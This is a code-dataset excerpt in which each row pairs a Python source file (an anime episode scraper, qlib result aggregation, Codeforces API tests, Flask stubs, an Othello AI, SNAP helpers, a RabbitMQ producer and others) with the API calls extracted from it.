code (string, 20 to 1.05M chars) | apis (sequence) | extract_api (string, 75 to 5.24M chars)
---|---|---
import os
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen, urlretrieve
import wget
import requests
def download(url, file_name):
headers = {'User-Agent': 'Mozilla', 'Referer': 'https://animesvision.biz'}
r = requests.get(url, allow_redirects=True, headers=headers)
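# Stream the response to disk in 1 KiB chunks instead of loading the whole file into memory.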
with open(file_name, 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return file_name
def getEpisodeList(url):
site = url # Removes the /n
print(site)
req = Request(site, headers={'User-Agent': 'Mozilla'})
webpage = urlopen(req).read()
soup = BeautifulSoup(webpage, 'html.parser')
episode_list = soup.findAll("div", {"class": "sli-btn"})
return episode_list
def getEpisodeLink(episode):
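# The download URL is embedded as the first single-quoted argument of the second anchor's onclick handler.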
on_click_value = episode.find_all('a')[1]['onclick']
url_download = on_click_value.split('\'')[1]
req = Request(url_download, headers={'User-Agent': 'Mozilla'})
webpage = urlopen(req).read()
soup = BeautifulSoup(webpage, 'html.parser')
item_to_download = soup.find_all('a', attrs={'style':'margin: 5px;'})[0]['href']
return item_to_download
# def downloadAll(url):
# site = url # Removes the /n
# print(site)
# req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# soup = BeautifulSoup(webpage, 'html.parser')
# episode_list = soup.findAll("div", {"class": "sli-btn"})
# for episode in episode_list:
# on_click_value = episode.find_all('a')[1]['onclick']
# url_download = on_click_value.split('\'')[1]
# req = Request(url_download, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# soup = BeautifulSoup(webpage, 'html.parser')
# item_to_download = soup.find_all('a', attrs={'style':'margin: 5px;'})[0]['href']
# print(item_to_download.split('/')[-1])
# finished_download_item = download(item_to_download, url('/')[-1] + '_' + item_to_download.split('/')[-1])
# print(item_to_download)
| [
"bs4.BeautifulSoup",
"urllib.request.Request",
"urllib.request.urlopen",
"requests.get"
] | [((250, 306), 'requests.get', 'requests.get', (['url'], {'allow_redirects': '(True)', 'headers': 'headers'}), '(url, allow_redirects=True, headers=headers)\n', (262, 306), False, 'import requests\n'), ((521, 569), 'urllib.request.Request', 'Request', (['site'], {'headers': "{'User-Agent': 'Mozilla'}"}), "(site, headers={'User-Agent': 'Mozilla'})\n", (528, 569), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((616, 653), 'bs4.BeautifulSoup', 'BeautifulSoup', (['webpage', '"""html.parser"""'], {}), "(webpage, 'html.parser')\n", (629, 653), False, 'from bs4 import BeautifulSoup\n'), ((886, 942), 'urllib.request.Request', 'Request', (['url_download'], {'headers': "{'User-Agent': 'Mozilla'}"}), "(url_download, headers={'User-Agent': 'Mozilla'})\n", (893, 942), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((989, 1026), 'bs4.BeautifulSoup', 'BeautifulSoup', (['webpage', '"""html.parser"""'], {}), "(webpage, 'html.parser')\n", (1002, 1026), False, 'from bs4 import BeautifulSoup\n'), ((584, 596), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (591, 596), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((957, 969), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (964, 969), False, 'from urllib.request import Request, urlopen, urlretrieve\n')] |
#####################################################
# Copyright (c) <NAME> [GitHub D-X-Y], 2021.02 #
#####################################################
# python exps/trading/organize_results.py
#####################################################
import sys, argparse
import numpy as np
from typing import List, Text
from collections import defaultdict, OrderedDict
from pathlib import Path
from pprint import pprint
import ruamel.yaml as yaml
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
import qlib
from qlib.config import REG_CN
from qlib.workflow import R
class QResult:
def __init__(self):
self._result = defaultdict(list)
def append(self, key, value):
self._result[key].append(value)
@property
def result(self):
return self._result
def update(self, metrics, filter_keys=None):
for key, value in metrics.items():
if filter_keys is not None and key in filter_keys:
key = filter_keys[key]
elif filter_keys is not None:
continue
self.append(key, value)
@staticmethod
def full_str(xstr, space):
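# Pad the value's string form to a fixed width so the printed metric columns line up.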
xformat = "{:" + str(space) + "s}"
return xformat.format(str(xstr))
def info(self, keys: List[Text], separate: Text = "", space: int = 25, show=True):
avaliable_keys = []
for key in keys:
if key not in self.result:
print("There is an invalid key [{:}].".format(key))
else:
avaliable_keys.append(key)
head_str = separate.join([self.full_str(x, space) for x in avaliable_keys])
values = []
for key in avaliable_keys:
current_values = self._result[key]
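# Summarise each metric as mean +/- std over all values collected for it.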
mean = np.mean(current_values)
std = np.std(current_values)
values.append("{:.4f} $\pm$ {:.4f}".format(mean, std))
value_str = separate.join([self.full_str(x, space) for x in values])
if show:
print(head_str)
print(value_str)
else:
return head_str, value_str
def compare_results(heads, values, names, space=10):
for idx, x in enumerate(heads):
assert x == heads[0], "[{:}] {:} vs {:}".format(idx, x, heads[0])
new_head = QResult.full_str("Name", space) + heads[0]
print(new_head)
for name, value in zip(names, values):
xline = QResult.full_str(name, space) + value
print(xline)
def filter_finished(recorders):
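# Keep only recorders whose status is FINISHED and count how many are not done yet.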
returned_recorders = dict()
not_finished = 0
for key, recorder in recorders.items():
if recorder.status == "FINISHED":
returned_recorders[key] = recorder
else:
not_finished += 1
return returned_recorders, not_finished
def main(xargs):
R.reset_default_uri(xargs.save_dir)
experiments = R.list_experiments()
key_map = {
"IC": "IC",
"ICIR": "ICIR",
"Rank IC": "Rank_IC",
"Rank ICIR": "Rank_ICIR",
"excess_return_with_cost.annualized_return": "Annualized_Return",
"excess_return_with_cost.information_ratio": "Information_Ratio",
"excess_return_with_cost.max_drawdown": "Max_Drawdown",
}
all_keys = list(key_map.values())
print("There are {:} experiments.".format(len(experiments)))
head_strs, value_strs, names = [], [], []
for idx, (key, experiment) in enumerate(experiments.items()):
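# Experiment id "0" appears to be qlib's default placeholder experiment, so it is skipped.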
if experiment.id == "0":
continue
recorders = experiment.list_recorders()
recorders, not_finished = filter_finished(recorders)
print(
"====>>>> {:02d}/{:02d}-th experiment {:9s} has {:02d}/{:02d} finished recorders.".format(
idx, len(experiments), experiment.name, len(recorders), len(recorders) + not_finished
)
)
result = QResult()
for recorder_id, recorder in recorders.items():
result.update(recorder.list_metrics(), key_map)
head_str, value_str = result.info(all_keys, show=False)
head_strs.append(head_str)
value_strs.append(value_str)
names.append(experiment.name)
compare_results(head_strs, value_strs, names, space=10)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Show Results")
parser.add_argument("--save_dir", type=str, default="./outputs/qlib-baselines", help="The checkpoint directory.")
args = parser.parse_args()
provider_uri = "~/.qlib/qlib_data/cn_data"
qlib.init(provider_uri=provider_uri, region=REG_CN)
main(args)
| [
"numpy.mean",
"argparse.ArgumentParser",
"pathlib.Path",
"qlib.workflow.R.reset_default_uri",
"qlib.init",
"collections.defaultdict",
"numpy.std",
"qlib.workflow.R.list_experiments"
] | [((2853, 2888), 'qlib.workflow.R.reset_default_uri', 'R.reset_default_uri', (['xargs.save_dir'], {}), '(xargs.save_dir)\n', (2872, 2888), False, 'from qlib.workflow import R\n'), ((2907, 2927), 'qlib.workflow.R.list_experiments', 'R.list_experiments', ([], {}), '()\n', (2925, 2927), False, 'from qlib.workflow import R\n'), ((4314, 4353), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Show Results"""'], {}), "('Show Results')\n", (4337, 4353), False, 'import sys, argparse\n'), ((4555, 4606), 'qlib.init', 'qlib.init', ([], {'provider_uri': 'provider_uri', 'region': 'REG_CN'}), '(provider_uri=provider_uri, region=REG_CN)\n', (4564, 4606), False, 'import qlib\n'), ((723, 740), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (734, 740), False, 'from collections import defaultdict, OrderedDict\n'), ((1825, 1848), 'numpy.mean', 'np.mean', (['current_values'], {}), '(current_values)\n', (1832, 1848), True, 'import numpy as np\n'), ((1867, 1889), 'numpy.std', 'np.std', (['current_values'], {}), '(current_values)\n', (1873, 1889), True, 'import numpy as np\n'), ((462, 476), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (466, 476), False, 'from pathlib import Path\n')] |
# -*- coding: utf-8 -*-
import requests
from codeforces.User import User
from codeforces.Contest import Contest
from codeforces.Problem import Problem
from codeforces.Submission import Submission
def test_user():
params = {"handles": "Vicfred"}
r = requests.get("https://codeforces.com/api/user.info", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
vicfred = User(**result[0])
assert vicfred.handle == "Vicfred"
print(vicfred)
def test_contest():
params = {"gym": "false"}
r = requests.get("https://codeforces.com/api/contest.list", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for contest in result:
print(Contest(**contest))
def test_problem():
params = {"tags": "implementation"}
r = requests.get("https://codeforces.com/api/problemset.problems", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for problem in result["problems"]:
print(Problem(**problem))
def test_submission():
params = {"handle": "Vicfred", "from": 1, "count": 10}
r = requests.get("https://codeforces.com/api/user.status", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for submission in result:
print(Submission(**submission))
| [
"codeforces.Submission.Submission",
"codeforces.User.User",
"codeforces.Contest.Contest",
"requests.get",
"codeforces.Problem.Problem"
] | [((259, 326), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/user.info"""'], {'params': 'params'}), "('https://codeforces.com/api/user.info', params=params)\n", (271, 326), False, 'import requests\n'), ((483, 500), 'codeforces.User.User', 'User', ([], {}), '(**result[0])\n', (487, 500), False, 'from codeforces.User import User\n'), ((619, 689), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/contest.list"""'], {'params': 'params'}), "('https://codeforces.com/api/contest.list', params=params)\n", (631, 689), False, 'import requests\n'), ((963, 1040), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/problemset.problems"""'], {'params': 'params'}), "('https://codeforces.com/api/problemset.problems', params=params)\n", (975, 1040), False, 'import requests\n'), ((1348, 1417), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/user.status"""'], {'params': 'params'}), "('https://codeforces.com/api/user.status', params=params)\n", (1360, 1417), False, 'import requests\n'), ((873, 891), 'codeforces.Contest.Contest', 'Contest', ([], {}), '(**contest)\n', (880, 891), False, 'from codeforces.Contest import Contest\n'), ((1236, 1254), 'codeforces.Problem.Problem', 'Problem', ([], {}), '(**problem)\n', (1243, 1254), False, 'from codeforces.Problem import Problem\n'), ((1604, 1628), 'codeforces.Submission.Submission', 'Submission', ([], {}), '(**submission)\n', (1614, 1628), False, 'from codeforces.Submission import Submission\n')] |
from flask import request
from common.request import jsoned
from tss.api import app
@app.route("/ping", methods=["GET", "POST"])
@jsoned({"action": "ping"})
def ping():
req = request.json
if req.get("action") == "ping":
return {"status": "pong"}
else:
return {"status": "invalid_action"}
@app.route("/create_task", methods=["POST"])
@jsoned({
"action": "create_task",
"user": "*",
"task_id": "id", #generate by ewi backend
"language": ["nvcc", "python.pycuda"],
"compiler_args": ["*"],
"program_args": ["*"],
"source_code": "*",
"source_hash": ""
})
def create_task():
req = request.json
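# Persistence is stubbed out below; for now the endpoint simply echoes the task back as registered.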
#conn = get_mongo_connection()
#user_tasks = conn.tasks.find({"user": req.user})
#for task in user_tasks:
# if req.source_hash == task.source_hash:
# return {"status": "task_exists"}
# else:
# #some checks maybe
#maybe form another dict and do some checks
#conn.tasks.insert(req)
#return {"status": "task_registered"}
if req.get("action", False) == "create_task":
return {
"status": "task_registered",
"user": req["user"],
"task_id": req["task_id"]
}
else:
return {"status": "invalid_action"}
@app.route("/task_info", methods=["POST"])
@jsoned({
"action": "task_info",
"user": "*",
"task_id": "id"
})
def task_info():
req = request.json
#conn = get_mongo_connection()
#task = conn.tasks.find_one({"task_id": req["task_id"]})
#maybe alter something
#if task:
# return {"status": "ok",
# "task_status": task["status"],
# ### other info}
#else:
# return {"status": "error",
# "description": "task {0} not found".format(req["task_id"])}
return {"status": "test_status"}
@app.route("/list_tasks", methods=["POST"])
@jsoned({
"action": "list_tasks",
"user": "*",
"filter": ["done", "send", "fail"]
})
def list_tasks():
req = request.json
return {"status": "no_such_tasks"}
| [
"common.request.jsoned",
"tss.api.app.route"
] | [((88, 131), 'tss.api.app.route', 'app.route', (['"""/ping"""'], {'methods': "['GET', 'POST']"}), "('/ping', methods=['GET', 'POST'])\n", (97, 131), False, 'from tss.api import app\n'), ((133, 159), 'common.request.jsoned', 'jsoned', (["{'action': 'ping'}"], {}), "({'action': 'ping'})\n", (139, 159), False, 'from common.request import jsoned\n'), ((322, 365), 'tss.api.app.route', 'app.route', (['"""/create_task"""'], {'methods': "['POST']"}), "('/create_task', methods=['POST'])\n", (331, 365), False, 'from tss.api import app\n'), ((367, 564), 'common.request.jsoned', 'jsoned', (["{'action': 'create_task', 'user': '*', 'task_id': 'id', 'language': ['nvcc',\n 'python.pycuda'], 'compiler_args': ['*'], 'program_args': ['*'],\n 'source_code': '*', 'source_hash': ''}"], {}), "({'action': 'create_task', 'user': '*', 'task_id': 'id', 'language':\n ['nvcc', 'python.pycuda'], 'compiler_args': ['*'], 'program_args': ['*'\n ], 'source_code': '*', 'source_hash': ''})\n", (373, 564), False, 'from common.request import jsoned\n'), ((1278, 1319), 'tss.api.app.route', 'app.route', (['"""/task_info"""'], {'methods': "['POST']"}), "('/task_info', methods=['POST'])\n", (1287, 1319), False, 'from tss.api import app\n'), ((1321, 1382), 'common.request.jsoned', 'jsoned', (["{'action': 'task_info', 'user': '*', 'task_id': 'id'}"], {}), "({'action': 'task_info', 'user': '*', 'task_id': 'id'})\n", (1327, 1382), False, 'from common.request import jsoned\n'), ((1852, 1894), 'tss.api.app.route', 'app.route', (['"""/list_tasks"""'], {'methods': "['POST']"}), "('/list_tasks', methods=['POST'])\n", (1861, 1894), False, 'from tss.api import app\n'), ((1896, 1981), 'common.request.jsoned', 'jsoned', (["{'action': 'list_tasks', 'user': '*', 'filter': ['done', 'send', 'fail']}"], {}), "({'action': 'list_tasks', 'user': '*', 'filter': ['done', 'send',\n 'fail']})\n", (1902, 1981), False, 'from common.request import jsoned\n')] |
import copy
import random
from piece import Piece
class Player(object):
def __init__(self, name, stone_type):
self.name = name
self.stone_type = stone_type
self.turn = False
self.score = 0
class Enemy(Player):
"""Player with an AI.
"""
def get_possible_moves(self, board):
"""Returns a list of [x,y] lists of valid moves on the given board.
"""
# Check every tile on the board, get list of possible valid places
valids = []
for x in range(1, board.width + 1):
for y in range(1, board.height + 1):
new_piece = Piece(
position=(x - 1, y - 1),
state=self.stone_type
)
if board.is_valid_move(new_piece):
valids.append(new_piece)
return valids
def get_move(self, board):
"""
Args:
board: The Board to look for moves on.
Returns:
False if no moves, else the Piece selected
"""
possible_moves = self.get_possible_moves(board)
if len(possible_moves) == 0:
return False
# Randomize starting point
random.shuffle(possible_moves)
# Corner takes priority
for p in possible_moves:
if board.is_corner(p.x, p.y):
return p
# Can't go to corner, so find best possible move
best_score = -1
best_move = possible_moves[0]
for p in possible_moves:
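# Evaluate each candidate move on a deep copy so the real board is never mutated.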
b = copy.deepcopy(board)
result = b.try_move((p.x, p.y), self.stone_type)
if result > best_score:
best_move = p
best_score = result
return best_move
| [
"piece.Piece",
"random.shuffle",
"copy.deepcopy"
] | [((1219, 1249), 'random.shuffle', 'random.shuffle', (['possible_moves'], {}), '(possible_moves)\n', (1233, 1249), False, 'import random\n'), ((1553, 1573), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (1566, 1573), False, 'import copy\n'), ((632, 685), 'piece.Piece', 'Piece', ([], {'position': '(x - 1, y - 1)', 'state': 'self.stone_type'}), '(position=(x - 1, y - 1), state=self.stone_type)\n', (637, 685), False, 'from piece import Piece\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021, SERTIT-ICube - France, https://sertit.unistra.fr/
# This file is part of sertit-utils project
# https://github.com/sertit/sertit-utils
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
SNAP tools
"""
import logging
import os
import psutil
from sertit import misc, strings
from sertit.logs import SU_NAME
MAX_CORES = os.cpu_count() - 2
MAX_MEM = int(os.environ.get("JAVA_OPTS_XMX", 0.95 * psutil.virtual_memory().total))
TILE_SIZE = 2048
LOGGER = logging.getLogger(SU_NAME)
def bytes2snap(nof_bytes: int) -> str:
"""
Convert nof bytes into snap-compatible Java options.
.. code-block:: python
>>> bytes2snap(32000)
'31K'
Args:
nof_bytes (int): Byte nb
Returns:
str: Human-readable in bits
"""
symbols = ("K", "M", "G", "T", "P", "E", "Z", "Y")
prefix = {}
for idx, sym in enumerate(symbols):
prefix[sym] = 1 << (idx + 1) * 10
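# Walk the units from largest to smallest and report the first one the byte count reaches.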
for sym in reversed(symbols):
if nof_bytes >= prefix[sym]:
value = int(float(nof_bytes) / prefix[sym])
return "%s%s" % (value, sym)
return "%sB" % nof_bytes
def get_gpt_cli(
graph_path: str, other_args: list, display_snap_opt: bool = False
) -> list:
"""
Get GPT command line with system OK optimizations.
To see options, type this command line with --diag (but it won't run the graph)
.. code-block:: python
>>> get_gpt_cli("graph_path", other_args=[], display_snap_opt=True)
SNAP Release version 8.0
SNAP home: C:\Program Files\snap\bin\/..
SNAP debug: null
SNAP log level: WARNING
Java home: c:\program files\snap\jre\jre
Java version: 1.8.0_242
Processors: 16
Max memory: 53.3 GB
Cache size: 30.0 GB
Tile parallelism: 14
Tile size: 2048 x 2048 pixels
To configure your gpt memory usage:
Edit snap/bin/gpt.vmoptions
To configure your gpt cache size and parallelism:
Edit .snap/etc/snap.properties or gpt -c ${cachesize-in-GB}G -q ${parallelism}
['gpt', '"graph_path"', '-q', 14, '-J-Xms2G -J-Xmx60G', '-J-Dsnap.log.level=WARNING',
'-J-Dsnap.jai.defaultTileSize=2048', '-J-Dsnap.dataio.reader.tileWidth=2048',
'-J-Dsnap.dataio.reader.tileHeigh=2048', '-J-Dsnap.jai.prefetchTiles=true', '-c 30G']
Args:
graph_path (str): Graph path
other_args (list): Other args as a list such as `['-Pfile="in_file.zip", '-Pout="out_file.dim"']`
display_snap_opt (bool): Display SNAP options via --diag
Returns:
list: GPT command line as a list
"""
gpt_cli = [
"gpt",
strings.to_cmd_string(graph_path),
"-q",
MAX_CORES, # Maximum parallelism
f"-J-Xms2G -J-Xmx{bytes2snap(MAX_MEM)}", # Initially/max allocated memory
"-J-Dsnap.log.level=WARNING",
f"-J-Dsnap.jai.defaultTileSize={TILE_SIZE}",
f"-J-Dsnap.dataio.reader.tileWidth={TILE_SIZE}",
f"-J-Dsnap.dataio.reader.tileHeight={TILE_SIZE}",
"-J-Dsnap.jai.prefetchTiles=true",
f"-c {bytes2snap(int(0.5 * MAX_MEM))}", # Tile cache set to 50% of max memory (up to 75%)
# '-x',
*other_args,
] # Clears the internal tile cache after writing a complete row to the target file
# LOGs
LOGGER.debug(gpt_cli)
if display_snap_opt:
misc.run_cli(gpt_cli + ["--diag"])
return gpt_cli
| [
"logging.getLogger",
"sertit.misc.run_cli",
"psutil.virtual_memory",
"sertit.strings.to_cmd_string",
"os.cpu_count"
] | [((995, 1021), 'logging.getLogger', 'logging.getLogger', (['SU_NAME'], {}), '(SU_NAME)\n', (1012, 1021), False, 'import logging\n'), ((865, 879), 'os.cpu_count', 'os.cpu_count', ([], {}), '()\n', (877, 879), False, 'import os\n'), ((3193, 3226), 'sertit.strings.to_cmd_string', 'strings.to_cmd_string', (['graph_path'], {}), '(graph_path)\n', (3214, 3226), False, 'from sertit import misc, strings\n'), ((3911, 3945), 'sertit.misc.run_cli', 'misc.run_cli', (["(gpt_cli + ['--diag'])"], {}), "(gpt_cli + ['--diag'])\n", (3923, 3945), False, 'from sertit import misc, strings\n'), ((937, 960), 'psutil.virtual_memory', 'psutil.virtual_memory', ([], {}), '()\n', (958, 960), False, 'import psutil\n')] |
import json
from django.http import HttpResponse
from sms_handler.SmsParser import SmsParser
sample_sms = "J1!test_form_2!uuid#ce546ca8b4c44c329685cffccb7c90c8\
#Question_1#option_3#Question_2#option_2 option_3 option_5\
#Question_3#Bdhud\#\#\#\#hbxbc#Question_4#8451#Question_5#469464.349\
#question_6#2016-01-18#Question_7#16:20:00.000+05:45#Question_8\
#27.7111128 85.318415 0.0 36.0#Question_9#1453113337876.jpg#Question_10\
#1453113348755.amr#Question_11#1453113368638.mp4#start\
#2016-01-18T16:19:38.539+05:45#end#2016-01-18T16:21:15.762+05:45\
#instanceID#uuid:9eea2d7d-8091-4d22-8472-bbbe3395b25f#"
def sms_data_api(request):
sms_parser = SmsParser(sample_sms)
return HttpResponse(json.dumps(sms_parser.parameters))
| [
"json.dumps",
"sms_handler.SmsParser.SmsParser"
] | [((657, 678), 'sms_handler.SmsParser.SmsParser', 'SmsParser', (['sample_sms'], {}), '(sample_sms)\n', (666, 678), False, 'from sms_handler.SmsParser import SmsParser\n'), ((703, 736), 'json.dumps', 'json.dumps', (['sms_parser.parameters'], {}), '(sms_parser.parameters)\n', (713, 736), False, 'import json\n')] |
import os
import csv
import logging
import itertools
import data
class MirCat(object):
def __init__(self, directory=None):
"""
http://www.mirrna.org/
"""
if not directory:
directory = data.source_data_dir('mircat')
self.directory = directory
def read_file(self, name):
path = os.path.join(self.directory, name)
with open(path) as read_file:
reader = csv.DictReader(read_file, delimiter='\t')
for row in reader:
yield row
def read_mirna(self):
name_to_mircat = dict()
identifier_to_genes = data.Data().mirbase.identifier_to_genes
matched = 0
for row in self.read_file('mirna.txt'):
mircat_name = row['mircat_name']
hgncs = identifier_to_genes(mircat_name)
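# Some MirCat names use '-miR-'; retry with the lowercase '-mir-' spelling before giving up.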
if hgncs is None:
replaced = mircat_name.replace('-miR-', '-mir-')
hgncs = identifier_to_genes(replaced)
if hgncs:
matched += 1
row['hgncs'] = hgncs
name_to_mircat[mircat_name] = row
logging.info('MirCat miRNAs matched to HGNC {} out of {}'.format(
matched, len(name_to_mircat)))
return name_to_mircat
def read_targets(self):
symbol_to_gene = data.Data().hgnc.get_symbol_to_gene()
name_to_mircat = self.read_mirna()
mirna_targets = list()
for row in self.read_file('target.txt'):
target = symbol_to_gene.get(row['gene_symbol'])
mircat_row = name_to_mircat[row['mircat_name']]
sources = mircat_row['hgncs']
row['target'] = target
row['sources'] = sources
if not target or not sources:
continue
yield row
def interaction_generator(self):
for row in self.read_targets():
target = row['target']
for source in row['sources']:
interaction = {'source': source, 'target': target, 'pubmed': row['pubmed']}
yield interaction
if __name__ == '__main__':
mircat = MirCat()
#mircat.read_mirna()
#mircat.read_targets()
import pprint
ixns = list(mircat.interaction_generator())
pprint.pprint(ixns)
| [
"csv.DictReader",
"data.source_data_dir",
"os.path.join",
"data.Data",
"pprint.pprint"
] | [((2300, 2319), 'pprint.pprint', 'pprint.pprint', (['ixns'], {}), '(ixns)\n', (2313, 2319), False, 'import pprint\n'), ((357, 391), 'os.path.join', 'os.path.join', (['self.directory', 'name'], {}), '(self.directory, name)\n', (369, 391), False, 'import os\n'), ((240, 270), 'data.source_data_dir', 'data.source_data_dir', (['"""mircat"""'], {}), "('mircat')\n", (260, 270), False, 'import data\n'), ((451, 492), 'csv.DictReader', 'csv.DictReader', (['read_file'], {'delimiter': '"""\t"""'}), "(read_file, delimiter='\\t')\n", (465, 492), False, 'import csv\n'), ((639, 650), 'data.Data', 'data.Data', ([], {}), '()\n', (648, 650), False, 'import data\n'), ((1329, 1340), 'data.Data', 'data.Data', ([], {}), '()\n', (1338, 1340), False, 'import data\n')] |
from random import randint
from uuid import uuid4
from faker import Faker
from stilio.persistence import database
from stilio.persistence.database import db
from stilio.persistence.torrents.models import Torrent, File
@db.connection_context()
def create_fake_data() -> None:
fake = Faker()
for i in range(1_000):
torrent_id = Torrent.insert(info_hash=uuid4(), name=fake.text()[10:]).execute()
for j in range(randint(1, 10)):
File.insert(
path="path", size=randint(1, 10000), torrent=torrent_id
).execute()
print(f"Added torrent with ID {torrent_id} to the database")
if __name__ == "__main__":
database.init()
create_fake_data()
| [
"stilio.persistence.database.init",
"uuid.uuid4",
"faker.Faker",
"stilio.persistence.database.db.connection_context",
"random.randint"
] | [((223, 246), 'stilio.persistence.database.db.connection_context', 'db.connection_context', ([], {}), '()\n', (244, 246), False, 'from stilio.persistence.database import db\n'), ((290, 297), 'faker.Faker', 'Faker', ([], {}), '()\n', (295, 297), False, 'from faker import Faker\n'), ((676, 691), 'stilio.persistence.database.init', 'database.init', ([], {}), '()\n', (689, 691), False, 'from stilio.persistence import database\n'), ((436, 450), 'random.randint', 'randint', (['(1)', '(10)'], {}), '(1, 10)\n', (443, 450), False, 'from random import randint\n'), ((371, 378), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (376, 378), False, 'from uuid import uuid4\n'), ((512, 529), 'random.randint', 'randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (519, 529), False, 'from random import randint\n')] |
import discord
from discord.ext import commands
import sys
import random
sys.path.insert(1, '../')
from config import *
sys.path.insert(1, '../constants')
from colors import *
from constants import *
#Loading Cog
class utoimages(commands.Cog):
def __init__(self, bot):
self.bot = bot
def setup(bot):
bot.add_cog(utoimages(bot))
bot.add_command(utoimg)
@commands.command(aliases=["utoimage", "utopic"])
async def utoimg(ctx):
web = "https://the-bot.tk/uto/"
unallowed = [235, 255, 336, 311, 272, 71]
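# Presumably image ids that are missing or broken on the host; fall back to id 1 if one is drawn.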
x = random.randrange(0, 385)
if int(x) in unallowed:
x = 1
web = web + str(x) + ".jpg"
embed=discord.Embed(title="Random Uto Image", color=0x9aecdb)
embed.set_footer(text=f"Bot version: {const.version}")
embed.set_image(url=web)
await ctx.send(embed=embed)
print(f"{ctx.author.name}#{ctx.author.discriminator} issued .utoimg at {ctx.author.guild.name}")
| [
"sys.path.insert",
"discord.Embed",
"discord.ext.commands.command",
"random.randrange"
] | [((76, 101), 'sys.path.insert', 'sys.path.insert', (['(1)', '"""../"""'], {}), "(1, '../')\n", (91, 101), False, 'import sys\n'), ((123, 157), 'sys.path.insert', 'sys.path.insert', (['(1)', '"""../constants"""'], {}), "(1, '../constants')\n", (138, 157), False, 'import sys\n'), ((380, 428), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "['utoimage', 'utopic']"}), "(aliases=['utoimage', 'utopic'])\n", (396, 428), False, 'from discord.ext import commands\n'), ((542, 566), 'random.randrange', 'random.randrange', (['(0)', '(385)'], {}), '(0, 385)\n', (558, 566), False, 'import random\n'), ((651, 706), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Random Uto Image"""', 'color': '(10153179)'}), "(title='Random Uto Image', color=10153179)\n", (664, 706), False, 'import discord\n')] |
import pika
from pymongo import MongoClient
import time
import os
import random
import string
task_queue = os.environ['TASK_QUEUE']
def wait_for_queue_connection():
while True:
try:
credentials = pika.PlainCredentials(os.environ['RABBITMQ_USER'],
os.environ['RABBITMQ_PASS'])
params = pika.ConnectionParameters('rabbitmq', os.environ['RABBITMQ_PORT'], '/', credentials, heartbeat=0)
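# heartbeat=0 disables AMQP heartbeats so an idle producer is not dropped by the broker.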
connection = pika.BlockingConnection(params)
break
except Exception as ex:
print("Producer not connected to queue yet..")
time.sleep(1)
print("Connected")
return connection
connection = wait_for_queue_connection()
channel = connection.channel()
channel.queue_declare(queue=task_queue, durable=True)
channel.basic_qos(prefetch_count=1)
mongo_client = MongoClient('mongodb://mongodb:27017')
def get_random_string(length: int) -> str:
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
while True:
channel.basic_publish(exchange='',
routing_key='task_queue',
body=get_random_string(random.randint(1, 20)))
print("produced 1")
time.sleep(10)
| [
"random.choice",
"pika.ConnectionParameters",
"pika.BlockingConnection",
"pika.PlainCredentials",
"time.sleep",
"pymongo.MongoClient",
"random.randint"
] | [((886, 924), 'pymongo.MongoClient', 'MongoClient', (['"""mongodb://mongodb:27017"""'], {}), "('mongodb://mongodb:27017')\n", (897, 924), False, 'from pymongo import MongoClient\n'), ((1321, 1335), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1331, 1335), False, 'import time\n'), ((222, 301), 'pika.PlainCredentials', 'pika.PlainCredentials', (["os.environ['RABBITMQ_USER']", "os.environ['RABBITMQ_PASS']"], {}), "(os.environ['RABBITMQ_USER'], os.environ['RABBITMQ_PASS'])\n", (243, 301), False, 'import pika\n'), ((371, 472), 'pika.ConnectionParameters', 'pika.ConnectionParameters', (['"""rabbitmq"""', "os.environ['RABBITMQ_PORT']", '"""/"""', 'credentials'], {'heartbeat': '(0)'}), "('rabbitmq', os.environ['RABBITMQ_PORT'], '/',\n credentials, heartbeat=0)\n", (396, 472), False, 'import pika\n'), ((494, 525), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (517, 525), False, 'import pika\n'), ((1031, 1053), 'random.choice', 'random.choice', (['letters'], {}), '(letters)\n', (1044, 1053), False, 'import random\n'), ((647, 660), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (657, 660), False, 'import time\n'), ((1269, 1290), 'random.randint', 'random.randint', (['(1)', '(20)'], {}), '(1, 20)\n', (1283, 1290), False, 'import random\n')] |
import unittest
from problems.problem10 import solution
class Test(unittest.TestCase):
def test(self):
